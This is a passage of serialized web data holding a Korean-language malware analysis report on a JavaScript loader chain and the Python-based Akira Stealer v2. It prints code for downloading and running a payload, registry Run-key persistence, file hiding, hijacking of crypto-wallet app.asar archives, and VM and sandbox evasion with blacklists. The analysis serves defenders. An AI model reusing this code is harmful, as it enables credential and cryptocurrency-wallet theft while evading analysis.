\"%BINDERURL%\"",[1679,4205,3441],{"class":3001},[1679,4207,4208,4210,4212,4214,4216,4218,4220,4222,4224],{"class":1681,"line":2059},[1679,4209,2992],{"class":2991},[1679,4211,3464],{"class":2773},[1679,4213,2998],{"class":2991},[1679,4215,3469],{"class":2991},[1679,4217,3472],{"class":3001},[1679,4219,3475],{"class":2765},[1679,4221,3478],{"class":3001},[1679,4223,3481],{"class":2769},[1679,4225,3484],{"class":3001},[1679,4227,4228,4230,4232,4234,4236,4238],{"class":1681,"line":2065},[1679,4229,2992],{"class":2991},[1679,4231,3502],{"class":2773},[1679,4233,2998],{"class":2991},[1679,4235,3507],{"class":3001},[1679,4237,3510],{"class":2765},[1679,4239,4240],{"class":3001},"(binderFile);\n",[1679,4242,4243,4245,4247],{"class":1681,"line":2071},[1679,4244,3518],{"class":3001},[1679,4246,3521],{"class":2765},[1679,4248,3524],{"class":3001},[603,4250,4251,4256],{},[606,4252,4253,4255],{},[550,4254,3352],{}," 파일은 시스템의 임시 디렉터리에 저장됩니다.",[606,4257,4258,4260],{},[550,4259,2869],{},"과 마찬가지로, 바이너리는 전체를 메모리에 로드하지 않기 위해 Axios를 사용해 스트리밍 방식으로 다운로드됩니다.",[532,4262,4263],{},[539,4264,4265],{},"실행 전략",[532,4267,4268,4269,4271],{},"성공적으로 다운로드된 후, 스크립트는 ",[550,4270,1102],{},"를 사용해 다운로드된 바이너리를 호출하여 새 셸 컨텍스트에서 실행되도록 합니다:",[587,4273,4275],{"className":2982,"code":4274,"language":2984,"meta":593,"style":593},"exec(`start cmd /c start ${binderFile}`, ...);\n",[550,4276,4277],{"__ignoreMap":593},[1679,4278,4279,4281,4283,4286,4289,4292,4294,4297],{"class":1681,"line":1682},[1679,4280,3909],{"class":2765},[1679,4282,3193],{"class":3001},[1679,4284,4285],{"class":2769},"`start cmd /c start ${",[1679,4287,4288],{"class":3001},"binderFile",[1679,4290,4291],{"class":2769},"}`",[1679,4293,619],{"class":3001},[1679,4295,4296],{"class":2991},"...",[1679,4298,3058],{"class":3001},[532,4300,4301],{},"신뢰성을 높이기 위해, 스크립트에는 재시도 로직이 포함되어 있습니다:",[587,4303,4305],{"className":2982,"code":4304,"language":2984,"meta":593,"style":593},"setTimeout(() => {\n  exec(...);\n}, 5000);\n",[550,4306,4307,4319,4330],{"__ignoreMap":593},[1679,4308,4309,4312,4315,4317],{"class":1681,"line":1682},[1679,4310,4311],{"class":2765},"setTimeout",[1679,4313,4314],{"class":3001},"(() ",[1679,4316,3781],{"class":2991},[1679,4318,3784],{"class":3001},[1679,4320,4321,4324,4326,4328],{"class":1681,"line":2059},[1679,4322,4323],{"class":2765},"  exec",[1679,4325,3193],{"class":3001},[1679,4327,4296],{"class":2991},[1679,4329,3058],{"class":3001},[1679,4331,4332,4335,4338],{"class":1681,"line":2065},[1679,4333,4334],{"class":3001},"}, ",[1679,4336,4337],{"class":2773},"5000",[1679,4339,3058],{"class":3001},[532,4341,4342],{},"이는 초기 실행이 실패하더라도(예: 시스템 부하나 경쟁 조건으로 인해) 멀웨어가 짧은 지연 후 바이너리 실행을 재시도하도록 보장합니다.",[532,4344,4345],{},[539,4346,4347],{},"바인더의 사용 사례",[532,4349,4350],{},"이 특정 샘플에서는 바인더 바이너리의 정확한 목적이 드러나지 않았지만(플레이스홀더 URL 때문에), 이러한 구성 요소는 일반적으로 다음에 사용됩니다:",[603,4352,4353,4356,4359,4362],{},[606,4354,4355],{},"주된 멀웨어 구성 요소의 재설치 또는 재실행",[606,4357,4358],{},"가짜 설치 프로그램이나 미끼 애플리케이션 표시",[606,4360,4361],{},"추가 스파이웨어, 백도어, 랜섬웨어 배포",[606,4363,4364],{},"시스템 설정 수정 또는 보안 기능 비활성화",[713,4366,4368],{"id":4367},"_63-요약","6.3 요약",[532,4370,719],{},[532,4372,4373,4375],{},[550,4374,2807],{},"는 산업 표준 암호화(PBKDF2 + AES-256-CBC)를 사용해 자신의 진정한 목적을 보호하는, 고도로 난독화되고 암호화된 JavaScript 로더입니다. 복호화되면, 다음을 수행하는 완전한 기능의 2단계 로더로 작동합니다:",[603,4377,4378,4384,4387,4393],{},[606,4379,4380,4381,4383],{},"추가 멀웨어(",[550,4382,2869],{},") 회수",[606,4385,4386],{},"페이로드 동작 동적 수정",[606,4388,4389,4390,4392],{},"실제 스틸러 스크립트(",[550,4391,584],{},") 실행",[606,4394,4395,4397],{},[550,4396,573],{},"를 복원하여 지속성 강화",[532,4399,4400,4401,4404],{},"암호화, 동적 실행, 모듈형 페이로드 회수, 파일리스 작동의 조합은 Electron 셸 안에서 Node.js 기능을 활용하는 ",[539,4402,4403],{},"고도로 발전된 JavaScript 기반 멀웨어 아키텍처","를 잘 보여 줍니다.",[528,4406,4408,4409,2013],{"id":4407},"_7-심층-분석-akira-stealer-v2-astorpy","7. 심층 분석: Akira Stealer v2 (",[550,4410,584],{},[532,4412,534],{},[713,4414,4416],{"id":4415},"_71-상위-수준-기능","7.1. 상위 수준 기능",[532,4418,719],{},[532,4420,4421,4422,4424],{},"Akira Stealer v2(",[550,4423,584],{},")는 Python으로 작성된 다기능 모듈형 인포스틸러 멀웨어입니다. Chromium 및 Firefox 기반 브라우저, 암호화폐 지갑, 통신 클라이언트(예: Discord, Telegram), 시스템 파일에서 광범위한 민감 사용자 데이터를 유출하도록 설계되었습니다. 정교한 분석 방해 메커니즘, 레지스트리 기반 지속성, 클립보드 하이재킹, 메모리 인젝션 기법을 통합합니다.",[713,4426,4428],{"id":4427},"_72-지속성-및-배포","7.2 지속성 및 배포",[532,4430,719],{},[861,4432,4434],{"id":4433},"_721-실행-체인-맥락","7.2.1 실행 체인 맥락",[532,4436,867],{},[532,4438,4439,4441],{},[550,4440,584],{},"는 독립적으로 실행되지 않고, 다단계 공격 체인의 최종 페이로드입니다:",[587,4443,4447],{"className":4444,"code":4445,"language":4446,"meta":593,"style":593},"language-plaintext shiki shiki-themes github-light github-dark","Updater.exe\n  └── main.exe (Electron app)\n        └── cmd.exe\n              └── python.exe astor.py\n","plaintext",[550,4448,4449,4454,4459,4464],{"__ignoreMap":593},[1679,4450,4451],{"class":1681,"line":1682},[1679,4452,4453],{},"Updater.exe\n",[1679,4455,4456],{"class":1681,"line":2059},[1679,4457,4458],{},"  └── main.exe (Electron app)\n",[1679,4460,4461],{"class":1681,"line":2065},[1679,4462,4463],{},"        └── cmd.exe\n",[1679,4465,4466],{"class":1681,"line":2071},[1679,4467,4468],{},"              └── python.exe astor.py\n",[532,4470,4471,4472,4474],{},"이 구조화된 실행 체인은 각 단계가 악성 기능을 다음 단계에 위임함으로써 탐지를 회피하도록 합니다. ",[550,4473,573],{},"가 시퀀스를 개시하며 지속성 유지를 담당합니다.",[861,4476,4478],{"id":4477},"_722-레지스트리-기반-지속성","7.2.2 레지스트리 기반 지속성",[532,4480,867],{},[532,4482,4483,4484,4486],{},"Akira는 현재 사용자의 Run 경로 아래에 레지스트리 키를 작성하여 지속성을 확립합니다. 이는 시스템이 시작될 때마다 ",[550,4485,573],{},"가 실행되도록 보장합니다:",[587,4488,4492],{"className":4489,"code":4490,"language":4491,"meta":593,"style":593},"language-python shiki shiki-themes github-light github-dark","command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\nos.system(command)\n","python",[550,4493,4494,4499],{"__ignoreMap":593},[1679,4495,4496],{"class":1681,"line":1682},[1679,4497,4498],{},"command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\n",[1679,4500,4501],{"class":1681,"line":2059},[1679,4502,4503],{},"os.system(command)\n",[603,4505,4506,4513,4520],{},[606,4507,4508,974,4511],{},[539,4509,4510],{},"경로",[550,4512,1651],{},[606,4514,4515,974,4517,4519],{},[539,4516,1656],{},[550,4518,1659],{},"(무해해 보이도록 선택됨)",[606,4521,4522,4524,4525],{},[539,4523,1664],{},": 일반적으로 ",[550,4526,4527],{},"AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\Updater.exe",[532,4529,4530,4531,4534],{},"이 명령은 PowerShell 또는 네이티브 ",[550,4532,4533],{},"os.system()"," 실행을 통해 자동 실행 항목을 조용히 작성합니다.",[861,4536,4538],{"id":4537},"_723-파일-은닉","7.2.3 파일 은닉",[532,4540,867],{},[532,4542,4543],{},"사용자와 단순한 AV 스캔으로부터 바이너리를 더욱 가리기 위해, 파일은 숨김 및 시스템 속성으로 표시됩니다:",[587,4545,4547],{"className":4489,"code":4546,"language":4491,"meta":593,"style":593},"subprocess.run([\"attrib\", \"+h\", \"+s\", destination_path])\n",[550,4548,4549],{"__ignoreMap":593},[1679,4550,4551],{"class":1681,"line":1682},[1679,4552,4546],{},[603,4554,4555,4561],{},[606,4556,4557,4560],{},[550,4558,4559],{},"+h",": 파일을 숨김으로 표시",[606,4562,4563,4566],{},[550,4564,4565],{},"+s",": 파일을 보호된 시스템 파일로 표시",[532,4568,4569],{},"이는 표준 Windows 탐색기 보기에서 파일을 효과적으로 제거하고 은닉성을 높입니다.",[861,4571,4573],{"id":4572},"_724-재감염-기법","7.2.4 재감염 기법",[532,4575,867],{},[532,4577,4578,4579,619,4582,4585,4586,4588],{},"멀웨어는 Electron 애플리케이션 하이재킹을 통한 자기 복제 및 재감염을 지원합니다. 구체적으로, Electron 기반 데스크톱 지갑(예: ",[539,4580,4581],{},"Exodus",[539,4583,4584],{},"Atomic Wallet",")의 ",[550,4587,1048],{}," 아카이브를 교체하여 정상 앱 시작 중에 악성 JavaScript를 실행합니다.",[532,4590,4591],{},"이 로직은 알려진 지갑 앱 경로를 찾습니다:",[587,4593,4595],{"className":4489,"code":4594,"language":4491,"meta":593,"style":593},"path = os.getenv(\"APPDATA\") + \"\\\\Exodus\\\\resources\\\\app.asar\"\n",[550,4596,4597],{"__ignoreMap":593},[1679,4598,4599],{"class":1681,"line":1682},[1679,4600,4594],{},[532,4602,4603,4604,4606],{},"대상 파일이 존재하면, 무기화된 아카이브로 덮어써집니다. 이는 ",[550,4605,573],{},"를 수동으로 정리한 후에도 지속성을 보장합니다.",[713,4608,4610,4611,2013],{"id":4609},"_73-분석-방해-회피클래스-vmprotect","7.3 분석 방해 / 회피(클래스: ",[550,4612,4613],{},"VmProtect",[532,4615,719],{},[861,4617,4619],{"id":4618},"_731-서론","7.3.1 서론",[532,4621,867],{},[532,4623,4624,4625,4628,4629,4631],{},"현대 멀웨어 캠페인에서, 가상화 및 샌드박스 환경에서의 분석을 회피하는 것은 은닉성을 유지하는 데 필수적입니다. ",[4626,4627,649],"em",{}," 는 분석가가 통제하는 환경에서 공격적으로 식별하고 실행을 중단하는 포괄적인 VM/샌드박스 탐지 모듈(",[550,4630,4613],{},")을 구현합니다. 이 보고서는 각 탐지 기법을 해부하고, 전체 블랙리스트 정의를 포함한 정확한 코드 스니펫을 제공하며, 사용된 분석 방법론을 개괄합니다.",[861,4633,4635],{"id":4634},"_732-개요","7.3.2 개요",[532,4637,867],{},[532,4639,4640,4642],{},[550,4641,4613],{}," 클래스는 분석 환경에서 실행을 조기에 중단하기 위해 견고한 VM 및 샌드박스 탐지를 구현합니다. 두 가지 탐지 수준을 지원합니다:",[603,4644,4645,4651],{},[606,4646,4647,4650],{},[539,4648,4649],{},"레벨 1",": 경량의 빠른 검사",[606,4652,4653,4656],{},[539,4654,4655],{},"레벨 2",": 심층적이고 포괄적인 탐침",[532,4658,4659,4662,4663,4666,4667,4670],{},[550,4660,4661],{},"VmProtect.isVM(level)","이 ",[550,4664,4665],{},"True","를 반환하면, 멀웨어는 ",[550,4668,4669],{},"sys.exit()","를 호출하여 추가 분석을 방지합니다.",[861,4672,4674],{"id":4673},"_733-탐지-수준","7.3.3 탐지 수준",[532,4676,867],{},[1391,4678,4680,4681],{"style":4679},"width:100%; border-collapse: collapse;","\n  ",[1407,4682,4683,4680,4694,4680,4704,4680,4714,4680,4723,4680,4733,4680,4742,4680,4751],{},[1397,4684,4685,4686,4685,4689,4685,4692,4680],{},"\n    ",[1400,4687,4688],{},"기능",[1400,4690,4649],{"style":4691},"text-align: center;",[1400,4693,4655],{"style":4691},[1397,4695,4685,4696,4685,4699,4685,4702,4680],{},[1412,4697,4698],{},"HTTPSimulation",[1412,4700,4701],{"style":4691},"✔️",[1412,4703,4701],{"style":4691},[1397,4705,4685,4707,4685,4710,4685,4712,4680],{"style":4706},"background-color: #f5f5f5;",[1412,4708,4709],{},"컴퓨터 이름 블랙리스트",[1412,4711,4701],{"style":4691},[1412,4713,4701],{"style":4691},[1397,4715,4685,4716,4685,4719,4685,4721,4680],{},[1412,4717,4718],{},"사용자 계정 블랙리스트",[1412,4720,4701],{"style":4691},[1412,4722,4701],{"style":4691},[1397,4724,4685,4725,4685,4728,4685,4731,4680],{"style":4706},[1412,4726,4727],{},"하드웨어 UUID 블랙리스트",[1412,4729,4730],{"style":4691},"❌",[1412,4732,4701],{"style":4691},[1397,4734,4685,4735,4685,4738,4685,4740,4680],{},[1412,4736,4737],{},"퍼블릭 호스팅 API 검사",[1412,4739,4730],{"style":4691},[1412,4741,4701],{"style":4691},[1397,4743,4685,4744,4685,4747,4685,4749,4680],{"style":4706},[1412,4745,4746],{},"레지스트리 및 GPU 힌트",[1412,4748,4730],{"style":4691},[1412,4750,4701],{"style":4691},[1397,4752,4685,4753,4685,4756,4685,4758,4680],{},[1412,4754,4755],{},"백그라운드 작업 종료",[1412,4757,4701],{"style":4691},[1412,4759,4701],{"style":4691},[826,4761],{"className":4762},[829,830],[861,4764,4766,4767,4769],{"id":4765},"_734-vmprotect-아키텍처","7.3.4 ",[550,4768,4613],{}," 아키텍처",[532,4771,867],{},[532,4773,4774,4776],{},[550,4775,4613],{}," 클래스는 다음과 같은 주요 메서드를 노출합니다:",[603,4778,4779,4786,4793,4800,4807,4814,4821,4828],{},[606,4780,4781],{},[539,4782,4783],{},[550,4784,4785],{},"checkUUID()",[606,4787,4788],{},[539,4789,4790],{},[550,4791,4792],{},"checkComputerName()",[606,4794,4795],{},[539,4796,4797],{},[550,4798,4799],{},"checkUsers()",[606,4801,4802],{},[539,4803,4804],{},[550,4805,4806],{},"checkHosting()",[606,4808,4809],{},[539,4810,4811],{},[550,4812,4813],{},"checkHTTPSimulation()",[606,4815,4816],{},[539,4817,4818],{},[550,4819,4820],{},"checkRegistry()",[606,4822,4823],{},[539,4824,4825],{},[550,4826,4827],{},"killTasks()",[606,4829,4830],{},[539,4831,4832],{},[550,4833,4834],{},"isVM(level)",[532,4836,4837,4838,4841],{},"각 메서드는 불리언을 반환하거나 회피 단계를 실행합니다. ",[550,4839,4840],{},"isVM"," 래퍼는 지정된 수준에 따라 이 검사들을 집계합니다.",[1391,4843,4680,4844],{"style":4679},[1407,4845,4846,4680,4858,4680,4872,4680,4886,4680,4899,4680,4912,4680,4925,4680,4938,4680,4953],{},[1397,4847,4685,4848,4685,4852,4685,4855,4680],{},[1400,4849,4851],{"style":4850},"text-align: left;","메서드",[1400,4853,4854],{"style":4850},"트리거 조건",[1400,4856,4857],{"style":4850},"설명",[1397,4859,4685,4860,4685,4864,4685,4869,4680],{},[1412,4861,4862],{},[550,4863,4785],{},[1412,4865,4866],{},[550,4867,4868],{},"isVM(2)",[1412,4870,4871],{},"WMI UUID 블랙리스트",[1397,4873,4685,4874,4685,4878,4685,4883,4680],{"style":4706},[1412,4875,4876],{},[550,4877,4792],{},[1412,4879,4880],{},[550,4881,4882],{},"isVM(1,2)",[1412,4884,4885],{},"환경 호스트명 일치",[1397,4887,4685,4888,4685,4892,4685,4896,4680],{},[1412,4889,4890],{},[550,4891,4799],{},[1412,4893,4894],{},[550,4895,4882],{},[1412,4897,4898],{},"사용자명 블랙리스트",[1397,4900,4685,4901,4685,4905,4685,4909,4680],{"style":4706},[1412,4902,4903],{},[550,4904,4806],{},[1412,4906,4907],{},[550,4908,4868],{},[1412,4910,4911],{},"ip-api.com을 통한 IP 호스팅 제공자 검사",[1397,4913,4685,4914,4685,4918,4685,4922,4680],{},[1412,4915,4916],{},[550,4917,4813],{},[1412,4919,4920],{},[550,4921,4882],{},[1412,4923,4924],{},"HTTPS 인터셉션 탐지",[1397,4926,4685,4927,4685,4931,4685,4935,4680],{"style":4706},[1412,4928,4929],{},[550,4930,4820],{},[1412,4932,4933],{},[550,4934,4868],{},[1412,4936,4937],{},"레지스트리 및 GPU 드라이버 아티팩트",[1397,4939,4685,4940,4685,4944,4685,4950,4680],{},[1412,4941,4942],{},[550,4943,4827],{},[1412,4945,4946,4949],{},[550,4947,4948],{},"isVM(...)"," 생성 시",[1412,4951,4952],{},"알려진 분석 프로세스를 종료",[1397,4954,4685,4955,4685,4959,4685,4962,4680],{"style":4706},[1412,4956,4957],{},[550,4958,4834],{},[1412,4960,4961],{},"init",[1412,4963,4964,4965,4967],{},"검사를 집계하고 ",[550,4966,4827],{}," 스레드를 호출",[826,4969],{"className":4970},[829,830],[587,4972,4974],{"className":4489,"code":4973,"language":4491,"meta":593,"style":593},"@staticmethod\ndef isVM(level: int) -> bool:\n    # Always start background task-killer\n    Thread(target=VmProtect.killTasks, daemon=True).start()\n    if level == 1:\n        # Fast path: HTTPS, hostname & user\n        return (\n            VmProtect.checkHTTPSimulation()\n            or VmProtect.checkComputerName()\n            or VmProtect.checkUsers()\n        )\n    if level == 2:\n        # Deep scan: includes UUID, hosting, registry & GPU\n        try:\n            return (\n                VmProtect.checkHTTPSimulation()\n                or VmProtect.checkUUID()\n                or VmProtect.checkComputerName()\n                or VmProtect.checkUsers()\n                or VmProtect.checkHosting()\n                or VmProtect.checkRegistry()\n            )\n        except:\n            return False\n    return False\n",[550,4975,4976,4981,4986,4991,4996,5001,5006,5011,5016,5021,5026,5032,5038,5044,5050,5056,5062,5068,5074,5080,5086,5092,5098,5104,5110],{"__ignoreMap":593},[1679,4977,4978],{"class":1681,"line":1682},[1679,4979,4980],{},"@staticmethod\n",[1679,4982,4983],{"class":1681,"line":2059},[1679,4984,4985],{},"def isVM(level: int) -> bool:\n",[1679,4987,4988],{"class":1681,"line":2065},[1679,4989,4990],{},"    # Always start background task-killer\n",[1679,4992,4993],{"class":1681,"line":2071},[1679,4994,4995],{},"    Thread(target=VmProtect.killTasks, daemon=True).start()\n",[1679,4997,4998],{"class":1681,"line":2393},[1679,4999,5000],{},"    if level == 1:\n",[1679,5002,5003],{"class":1681,"line":2399},[1679,5004,5005],{},"        # Fast path: HTTPS, hostname & user\n",[1679,5007,5008],{"class":1681,"line":3055},[1679,5009,5010],{},"        return (\n",[1679,5012,5013],{"class":1681,"line":3848},[1679,5014,5015],{},"            VmProtect.checkHTTPSimulation()\n",[1679,5017,5018],{"class":1681,"line":3854},[1679,5019,5020],{},"            or VmProtect.checkComputerName()\n",[1679,5022,5023],{"class":1681,"line":4103},[1679,5024,5025],{},"            or VmProtect.checkUsers()\n",[1679,5027,5029],{"class":1681,"line":5028},11,[1679,5030,5031],{},"        )\n",[1679,5033,5035],{"class":1681,"line":5034},12,[1679,5036,5037],{},"    if level == 2:\n",[1679,5039,5041],{"class":1681,"line":5040},13,[1679,5042,5043],{},"        # Deep scan: includes UUID, hosting, registry & GPU\n",[1679,5045,5047],{"class":1681,"line":5046},14,[1679,5048,5049],{},"        try:\n",[1679,5051,5053],{"class":1681,"line":5052},15,[1679,5054,5055],{},"            return (\n",[1679,5057,5059],{"class":1681,"line":5058},16,[1679,5060,5061],{},"                VmProtect.checkHTTPSimulation()\n",[1679,5063,5065],{"class":1681,"line":5064},17,[1679,5066,5067],{},"                or VmProtect.checkUUID()\n",[1679,5069,5071],{"class":1681,"line":5070},18,[1679,5072,5073],{},"                or VmProtect.checkComputerName()\n",[1679,5075,5077],{"class":1681,"line":5076},19,[1679,5078,5079],{},"                or VmProtect.checkUsers()\n",[1679,5081,5083],{"class":1681,"line":5082},20,[1679,5084,5085],{},"                or VmProtect.checkHosting()\n",[1679,5087,5089],{"class":1681,"line":5088},21,[1679,5090,5091],{},"                or VmProtect.checkRegistry()\n",[1679,5093,5095],{"class":1681,"line":5094},22,[1679,5096,5097],{},"            )\n",[1679,5099,5101],{"class":1681,"line":5100},23,[1679,5102,5103],{},"        except:\n",[1679,5105,5107],{"class":1681,"line":5106},24,[1679,5108,5109],{},"            return False\n",[1679,5111,5113],{"class":1681,"line":5112},25,[1679,5114,5115],{},"    return False\n",[861,5117,5119],{"id":5118},"_735-uuid-검사-하드웨어-uuid로-가상-머신-식별","7.3.5 UUID 검사 – 하드웨어 UUID로 가상 머신 식별",[532,5121,867],{},[532,5123,5124],{},"멀웨어 회피의 흔한 전술은 기저 하드웨어 환경의 지문을 채취하는 것입니다. 가상 머신을 알리는 가장 초기의 식별자 중 하나는 시스템 UUID(Universally Unique Identifier)입니다. VMware나 VirtualBox 같은 가상화 플랫폼은 종종 예측 가능하거나 재사용된 UUID를 생성하며, 멀웨어는 이를 사용해 가상화되거나 샌드박스화된 환경에서 실행 중인지 추론할 수 있습니다.",[587,5126,5128],{"className":4489,"code":5127,"language":4491,"meta":593,"style":593},"@staticmethod\ndef checkUUID() -> bool:\n    try:\n        raw = subprocess.run(\n            \"wmic csproduct get uuid\", shell=True,\n            capture_output=True\n        ).stdout.splitlines()[2].decode().strip()\n    except:\n        raw = \"\"\n    return raw in VmProtect.BLACKLISTED_UUIDS\n",[550,5129,5130,5134,5139,5144,5149,5154,5159,5164,5169,5174],{"__ignoreMap":593},[1679,5131,5132],{"class":1681,"line":1682},[1679,5133,4980],{},[1679,5135,5136],{"class":1681,"line":2059},[1679,5137,5138],{},"def checkUUID() -> bool:\n",[1679,5140,5141],{"class":1681,"line":2065},[1679,5142,5143],{},"    try:\n",[1679,5145,5146],{"class":1681,"line":2071},[1679,5147,5148],{},"        raw = subprocess.run(\n",[1679,5150,5151],{"class":1681,"line":2393},[1679,5152,5153],{},"            \"wmic csproduct get uuid\", shell=True,\n",[1679,5155,5156],{"class":1681,"line":2399},[1679,5157,5158],{},"            capture_output=True\n",[1679,5160,5161],{"class":1681,"line":3055},[1679,5162,5163],{},"        ).stdout.splitlines()[2].decode().strip()\n",[1679,5165,5166],{"class":1681,"line":3848},[1679,5167,5168],{},"    except:\n",[1679,5170,5171],{"class":1681,"line":3854},[1679,5172,5173],{},"        raw = \"\"\n",[1679,5175,5176],{"class":1681,"line":4103},[1679,5177,5178],{},"    return raw in VmProtect.BLACKLISTED_UUIDS\n",[532,5180,5181],{},"이 검사는 WMIC(Windows Management Instrumentation Command-line) 도구를 활용해 호스트 머신의 UUID를 추출합니다. 반환된 값은 가상 머신 템플릿이나 알려진 분석 환경과 흔히 연관되는 UUID 목록과 대조됩니다.",[861,5183,5185],{"id":5184},"_736-컴퓨터-이름-검사-호스트명으로-샌드박스-및-분석-환경-탐지","7.3.6 컴퓨터 이름 검사 – 호스트명으로 샌드박스 및 분석 환경 탐지",[532,5187,867],{},[532,5189,5190,5193],{},[550,5191,5192],{},"%COMPUTERNAME%"," 환경 변수를 통해 접근하는 시스템 호스트명은 종종 그 환경에 대한 단서를 드러냅니다. 분석가들은 \"DESKTOP-XXXXXXX\", \"WIN10ANALYSIS\" 같은 기본 또는 빠르게 생성된 호스트명이나 내부 환경과 연결된 이름을 자주 사용합니다. 멀웨어는 시스템의 호스트명을 블랙리스트와 비교하여 이를 악용합니다.",[587,5195,5197],{"className":4489,"code":5196,"language":4491,"meta":593,"style":593},"@staticmethod\ndef checkComputerName() -> bool:\n    name = os.getenv(\"computername\", \"\").lower()\n    return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n\nBLACKLISTED_COMPUTERNAMES = (\n    '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n    'desktop-vkeons4','ntt-eff-2w11wss',\n    # ... dozens more entries ...\n)\n",[550,5198,5199,5203,5208,5213,5218,5222,5227,5232,5237,5242],{"__ignoreMap":593},[1679,5200,5201],{"class":1681,"line":1682},[1679,5202,4980],{},[1679,5204,5205],{"class":1681,"line":2059},[1679,5206,5207],{},"def checkComputerName() -> bool:\n",[1679,5209,5210],{"class":1681,"line":2065},[1679,5211,5212],{},"    name = os.getenv(\"computername\", \"\").lower()\n",[1679,5214,5215],{"class":1681,"line":2071},[1679,5216,5217],{},"    return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[1679,5219,5220],{"class":1681,"line":2393},[1679,5221,3845],{"emptyLinePlaceholder":325},[1679,5223,5224],{"class":1681,"line":2399},[1679,5225,5226],{},"BLACKLISTED_COMPUTERNAMES = (\n",[1679,5228,5229],{"class":1681,"line":3055},[1679,5230,5231],{},"    '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n",[1679,5233,5234],{"class":1681,"line":3848},[1679,5235,5236],{},"    'desktop-vkeons4','ntt-eff-2w11wss',\n",[1679,5238,5239],{"class":1681,"line":3854},[1679,5240,5241],{},"    # ... dozens more entries ...\n",[1679,5243,5244],{"class":1681,"line":4103},[1679,5245,5246],{},")\n",[532,5248,5249],{},"일치가 발견되면, 멀웨어는 실행을 중단하거나 가짜 페이로드를 배포하여 전체 행위 분석을 회피할 수 있습니다.",[861,5251,5253],{"id":5252},"_737-사용자-계정-검사-분석가-또는-기본-계정-프로파일링","7.3.7 사용자 계정 검사 – 분석가 또는 기본 계정 프로파일링",[532,5255,867],{},[532,5257,5258],{},"또 다른 휴리스틱은 멀웨어가 실행되는 사용자명을 평가하는 것입니다. 많은 가상 머신 템플릿과 샌드박스는 \"Abby\", \"Test\", \"wdagutilityaccount\" 같은 흔한 사용자명을 재사용합니다. 이런 이름들은 엔트로피가 낮고 오픈 소스 샌드박스 환경에 하드코딩되어 있는 경우가 많습니다.",[587,5260,5262],{"className":4489,"code":5261,"language":4491,"meta":593,"style":593},"@staticmethod\ndef checkUsers() -> bool:\n    user = os.getlogin().lower()\n    return user in VmProtect.BLACKLISTED_USERS\n\nBLACKLISTED_USERS = (\n    'wdagutilityaccount','abby','peter wilson','hmarc',\n    'a.monaldo','tvm',\n    # ... 30+ more entries ...\n)\n",[550,5263,5264,5268,5273,5278,5283,5287,5292,5297,5302,5307],{"__ignoreMap":593},[1679,5265,5266],{"class":1681,"line":1682},[1679,5267,4980],{},[1679,5269,5270],{"class":1681,"line":2059},[1679,5271,5272],{},"def checkUsers() -> bool:\n",[1679,5274,5275],{"class":1681,"line":2065},[1679,5276,5277],{},"    user = os.getlogin().lower()\n",[1679,5279,5280],{"class":1681,"line":2071},[1679,5281,5282],{},"    return user in VmProtect.BLACKLISTED_USERS\n",[1679,5284,5285],{"class":1681,"line":2393},[1679,5286,3845],{"emptyLinePlaceholder":325},[1679,5288,5289],{"class":1681,"line":2399},[1679,5290,5291],{},"BLACKLISTED_USERS = (\n",[1679,5293,5294],{"class":1681,"line":3055},[1679,5295,5296],{},"    'wdagutilityaccount','abby','peter wilson','hmarc',\n",[1679,5298,5299],{"class":1681,"line":3848},[1679,5300,5301],{},"    'a.monaldo','tvm',\n",[1679,5303,5304],{"class":1681,"line":3854},[1679,5305,5306],{},"    # ... 30+ more entries ...\n",[1679,5308,5309],{"class":1681,"line":4103},[1679,5310,5246],{},[532,5312,5313],{},"이 검사는 재부팅이나 가상 머신 스냅샷 전반에서도 변하지 않을 수 있는 사용자 컨텍스트에 초점을 맞춰 탐지를 강화합니다.",[861,5315,5317],{"id":5316},"_738-호스팅-검사-퍼블릭-클라우드-인프라-탐지","7.3.8 호스팅 검사 – 퍼블릭 클라우드 인프라 탐지",[532,5319,867],{},[532,5321,5322,5323,5326],{},"일부 멀웨어는 외부 IP 인텔리전스 서비스를 사용해 감염된 시스템이 알려진 데이터 센터나 클라우드 제공자 환경에 있는지 확인합니다. 이 경우, ",[550,5324,5325],{},"ip-api.com","에 간단한 HTTP 요청을 보내 해당 IP가 \"hosting\"으로 플래그되었는지 묻습니다.",[587,5328,5330],{"className":4489,"code":5329,"language":4491,"meta":593,"style":593},"@staticmethod\ndef checkHosting() -> bool:\n    http = PoolManager(cert_reqs=\"CERT_NONE\")\n    try:\n        return http.request(\n            'GET',\n            'http://ip-api.com/line/?fields=hosting'\n        ).data.decode().strip() == 'true'\n    except:\n        return False\n",[550,5331,5332,5336,5341,5346,5350,5355,5360,5365,5370,5374],{"__ignoreMap":593},[1679,5333,5334],{"class":1681,"line":1682},[1679,5335,4980],{},[1679,5337,5338],{"class":1681,"line":2059},[1679,5339,5340],{},"def checkHosting() -> bool:\n",[1679,5342,5343],{"class":1681,"line":2065},[1679,5344,5345],{},"    http = PoolManager(cert_reqs=\"CERT_NONE\")\n",[1679,5347,5348],{"class":1681,"line":2071},[1679,5349,5143],{},[1679,5351,5352],{"class":1681,"line":2393},[1679,5353,5354],{},"        return http.request(\n",[1679,5356,5357],{"class":1681,"line":2399},[1679,5358,5359],{},"            'GET',\n",[1679,5361,5362],{"class":1681,"line":3055},[1679,5363,5364],{},"            'http://ip-api.com/line/?fields=hosting'\n",[1679,5366,5367],{"class":1681,"line":3848},[1679,5368,5369],{},"        ).data.decode().strip() == 'true'\n",[1679,5371,5372],{"class":1681,"line":3854},[1679,5373,5168],{},[1679,5375,5376],{"class":1681,"line":4103},[1679,5377,5378],{},"        return False\n",[532,5380,5381],{},"이는 멀웨어가 Microsoft Azure, AWS, DigitalOcean 등이 소유한 인프라에서 실행 중인지 판단할 수 있게 합니다. 샌드박싱의 위험 신호입니다.",[861,5383,5385],{"id":5384},"_739-https-시뮬레이션-검사-ssl-인터셉션-탐침","7.3.9 HTTPS 시뮬레이션 검사 – SSL 인터셉션 탐침",[532,5387,867],{},[532,5389,5390,5391,5394],{},"SSL 